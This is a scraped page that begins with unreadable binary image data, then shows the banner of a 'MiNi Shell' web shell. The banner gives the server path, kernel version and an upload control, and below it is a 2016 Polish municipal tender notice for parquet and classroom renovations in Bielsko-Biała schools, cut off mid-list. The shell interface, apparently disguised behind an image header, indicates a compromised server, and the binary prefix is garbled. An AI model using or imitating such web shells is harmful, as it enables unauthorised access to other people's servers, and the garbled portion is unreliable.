JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160524/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160524/57815-N-2016.html

<p class="kh_header"><b>Bielsko-Biała: Wykonanie robót remontowych, w szczególności posadzkarskich, w obiektach oświatowych w Bielsku-Białej</b><br>
<b>Numer ogłoszenia: 57815 - 2016; data zamieszczenia: 24.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Bielsku-Białej , plac Ratuszowy 1, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 4971497, faks 033 4971786, 8227539.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót remontowych, w szczególności posadzkarskich, w obiektach oświatowych w Bielsku-Białej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A, w przedmiocie której jest:
a.	Wymiana posadzki parkietowej w budynku Przedszkola nr 11 w Bielsku-Białej przy ul. 1 Maja 11, obejmująca:
- roboty przygotowawcze i zabezpieczające,  
- roboty rozbiórkowe posadzki z deszczułek,
- montaż parkietu oraz wykonanie prac towarzyszących,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.

b.	Remont posadzek parkietowych w dwóch salach w budynku Przedszkola nr 12 
w Bielsku-Białej przy ul. Sienkiewicza 8, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- szlifowanie i lakierowanie posadzki wraz z wypełnieniem szpar i szczelin w parkiecie,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.

c.	Remont posadzek parkietowych w dwóch salach w budynku Przedszkola nr 14 
w Bielsku-Białej przy ul. Radosnej 2, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- wymianę posadzki z parkietu,
- szlifowanie i lakierowanie posadzki wraz z wypełnieniem szpar i szczelin w parkiecie,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.

Część B, w przedmiocie której jest:
Remont pomieszczenia auli w budynku Zespołu Szkół Medycznych 
i Ogólnokształcących w Bielsku-Białej przy ul. Konopnickiej 6, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- roboty malarskie ścian,
- remont sufitu, tj. wymianę okładziny z kasetonów sufitowych na okładzinę z płyt gipsowo-kartonowych wraz z malowaniem,
- remont posadzki parkietowej, tj. częściową wymianę posadzki oraz szlifowanie 
i lakierowanie posadzki wraz z wypełnieniem szpar i szczelin w parkiecie,
- remont instalacji elektrycznych,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.

Część C, w przedmiocie której jest:   
a.	Remont dwóch sal lekcyjnych (nr 101 i 201) w budynku Zespołu Szkół Ogólnokształcących w Bielsku-Białej przy ul. Sterniczej 4, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- remont wykończenia ścian, tj. rozebranie okładziny z wykładziny dywanowej oraz przygotowanie podłoża i malowanie ścian,
- wymianę stolarki drzwiowej,
- zerwanie posadzki z tworzywa sztucznego,
- przygotowanie podłoża, ułożenie izolacji oraz posadzki z paneli podłogowych,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.

b.	Remont posadzek parkietowych w budynku Przedszkola nr 41 w Bielsku-Białej, 
przy ul. Międzyrzeckiej 60, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- szlifowanie, szpachlowanie i lakierowanie posadzki wraz z wypełnieniem szpar oraz szczelin w parkiecie,
- uzupełnienie listew przyściennych,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.

Część D, w przedmiocie której jest:   
a.	Wymiana posadzki na korytarzu pierwszego piętra w budynku Zespołu Szkół Specjalnych w Bielsku-Białej przy ul. Wapienickiej 45, obejmująca:
- roboty przygotowawcze i zabezpieczające,  
- zerwanie posadzki z tworzywa sztucznego,
- przygotowanie podłoża, ułożenie i zgrzewanie wykładziny rulonowej,
- wykonanie prac towarzyszących,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.

b. Remont posadzek w budynku Szkoły Podstawowej nr 32 w Bielsku-Białej przy ul.Cieszyńskiej 393, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- częściową wymianę posadzki parkietowej, szlifowanie i lakierowanie posadzki wraz 
z wypełnieniem szpar i szczelin w parkiecie - w pomieszczeniach auli oraz salach lekcyjnych nr 36, 37, 41, 42, 43,
- wymianę posadzki parkietowej na podłogę z paneli wraz z przygotowaniem podłoża 
i wykonaniem prac towarzyszących, w szczególności wymianę drzwi - w sali lekcyjnej nr 39,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.00-5, 45.40.00.00-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części  A oraz C zamówienia Zamawiający nie wprowadza szczególnych wymagań w tym zakresie.
Sposób dokonywania oceny spełnienia warunku: - na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu.
Dla Części  B zamówienia:
Opis sposobu dokonywania oceny spełnienia warunku: wykonanie  w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlanej, w zakresie której wyremontowano lub/i wymieniono posadzkę parkietową o powierzchni nie mniejszej niż 80 m2. 
Robota ta winna być wykonana w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.
Sposób dokonywania oceny spełnienia warunku: na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu oraz diokumentów.
Dla Części  D zamówienia:
Opis sposobu dokonywania oceny spełnienia warunku: wykonanie  w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej :  
a) jednej roboty budowlanej, w zakresie której wyremontowano lub/i wymieniono posadzkę parkietową o powierzchni nie mniejszej niż 50 m2
oraz
b) jednej roboty budowlanej, w zakresie której wykonano posadzkę ze zgrzewanych wykładzin rulonowych o powierzchni nie mniejszej niż 100 m2
Roboty te winny być wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Sposób dokonywania oceny spełnienia warunku: na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu oraz dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Dla Części B oraz D - Wykonawca w wykazie robót budowlanych zobowiązany jest wykazać:
Dla Części B - 
co najmniej jedną robotę budowlaną, w zakresie której wyremontowano lub/i wymieniono posadzkę parkietową o powierzchni nie mniejszej niż 80 m2.
Dla Części D - 
co najmniej jedną robotę budowlaną, w zakresie której: 
a) wyremontowano lub/i wymieniono posadzkę parkietową o powierzchni nie mniejszej niż 50 m2. 
oraz       
co najmniej jedną robotę budowlaną, w zakresie której: 
b) wykonano posadzkę ze zgrzewanych wykładzin rulonowych o powierzchni nie mniejszej niż 100 m2;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie Wykonawcy (złożone na formularzu OFERTA) o : -związaniu ofertą przez okres 30 dni; -zdobyciu informacji koniecznych do sporządzenia oferty; -zapoznaniu się z warunkami przetargu zawartymi w specyfikacji istotnych warunków zamówienia wraz z załącznikami i przyjęciu tych warunków bez zastrzeżeń; -zobowiązaniu się do zawarcia umowy na warunkach określonych we wzorze umowy; -realizacji części zamówienia przy pomocy podwykonawców. 2.Pełnomocnictwo lub upoważnienie do reprezentacji Wykonawcy (w przypadku gdy Wykonawcę reprezentuje pełnomocnik), podpisane przez osoby uprawnione do reprezentowania Wykonawcy i określające zakres umocowania. Dokument ten składa się jeśli umocowanie do reprezentacji Wykonawcy nie wynika z innych dokumentów załączonych do oferty. 3.Pełnomocnictwo do reprezentowania podmiotów występujących wspólnie (spółki cywilne, konsorcja). Pełnomocnictwo musi określać zakres umocowania i być podpisane przez reprezentantów wszystkich Wykonawców ubiegających się wspólnie o zamówienie, zgodnie z zasadami reprezentacji określonej w dokumentach, o których mowa w pkt III.4.2. Dokumenty złożone wraz z ofertą muszą jednoznaczne określać zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Okres gwarancji - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w następujących przypadkach: a) co do terminu zakończenia zamówienia, który może być przedłużony wskutek: 1) wystąpienia zdarzeń siły wyższej; 
2) wstrzymania robót przez Zamawiającego albo przerw w wykonywaniu robót powstałych 
na skutek okoliczności, za które ponosi odpowiedzialność Zamawiający; b) co do nieistotnych postanowień umowy, c) co do istotnych postanowień umowy, z ważnych powodów, a w szczególności o ile jest ona konieczna i wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. d) co do wynagrodzenia wykonawcy (ceny) z uwagi na zmianę stawki podatku Vat o kwotę wynikającą ze zmienionych stawek tego podatku obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.bielsko.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Inwestycji Urzędu Miejskiego w Bielsku-Białej , Pl. Ratuszowy 7, 43-300 Bielsko-Biała  (I piętro, pok. nr 11). Cena SIWZ w wersji papierowej 8,00 złotych brutto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2016 godzina 10:00, miejsce: Wydział Inwestycji Urzędu Miejskiego w Bielsku-Białej, Pl. Ratuszowy 7, 43-300 Bielsko-Biała (I piętro, pok. nr 11).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część A - Roboty remontowe (posadzkarkie) w obiektach przedszkolnych w Bielsku-Białej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a). Wymiana posadzki parkietowej w budynku Przedszkola nr 11 w Bielsku-Białej przy ul. 1 Maja 11, obejmująca:
- roboty przygotowawcze i zabezpieczające,  
- roboty rozbiórkowe posadzki z deszczułek,
- montaż parkietu oraz wykonanie prac towarzyszących,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.
b).Remont posadzek parkietowych w dwóch salach w budynku Przedszkola nr 12 
w Bielsku-Białej przy ul. Sienkiewicza 8, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- szlifowanie i lakierowanie posadzki wraz z wypełnieniem szpar i szczelin w parkiecie,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.
c).Remont posadzek parkietowych w dwóch salach w budynku Przedszkola nr 14 
w Bielsku-Białej przy ul. Radosnej 2, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- wymianę posadzki z parkietu,
- szlifowanie i lakierowanie posadzki wraz z wypełnieniem szpar i szczelin w parkiecie,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.00-5, 45.40.00.00-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część B - Remont pomieszczenia auli w budynku Zespołu Szkół Medycznych i Ogólnokształcących w Bielsku-Białej przy ul. Konopnickiej 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont pomieszczenia auli w budynku Zespołu Szkół Medycznych i Ogólnokształcących w Bielsku-Białej przy ul. Konopnickiej 6, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- roboty malarskie ścian,
- remont sufitu, tj. wymianę okładziny z kasetonów sufitowych na okładzinę z płyt gipsowo-kartonowych wraz z malowaniem,
- remont posadzki parkietowej, tj. częściową wymianę posadzki oraz szlifowanie 
i lakierowanie posadzki wraz z wypełnieniem szpar i szczelin w parkiecie,
- remont instalacji elektrycznych,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.00-5, 45.40.00.00-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część C - Roboty remontowe w obiektach oświatowych w Bielsku-Białej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część C zamówienia:
a. Remont dwóch sal lekcyjnych (nr 101 i 201) w budynku Zespołu Szkół Ogólnokształcących w Bielsku-Białej przy ul. Sterniczej 4, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- remont wykończenia ścian, tj. rozebranie okładziny z wykładziny dywanowej oraz przygotowanie podłoża i malowanie ścian,
- wymianę stolarki drzwiowej,
- zerwanie posadzki z tworzywa sztucznego,
- przygotowanie podłoża, ułożenie izolacji oraz posadzki z paneli podłogowych,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.
b. Remont posadzek parkietowych w budynku Przedszkola nr 41 w Bielsku-Białej, przy ul. Międzyrzeckiej 60, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- szlifowanie, szpachlowanie i lakierowanie posadzki wraz z wypełnieniem szpar oraz szczelin w parkiecie,
- uzupełnienie listew przyściennych,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.00-5, 45.40.00.00-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część D - Roboty remontowe w obiektach oświatowych w Bielsku-Białej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część D zamówienia:
a. Wymiana posadzki na korytarzu pierwszego piętra w budynku Zespołu Szkół Specjalnych w Bielsku-Białej przy ul. Wapienickiej 45, obejmująca:
- roboty przygotowawcze i zabezpieczające,  
- zerwanie posadzki z tworzywa sztucznego,
- przygotowanie podłoża, ułożenie i zgrzewanie wykładziny rulonowej,
- wykonanie prac towarzyszących,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.
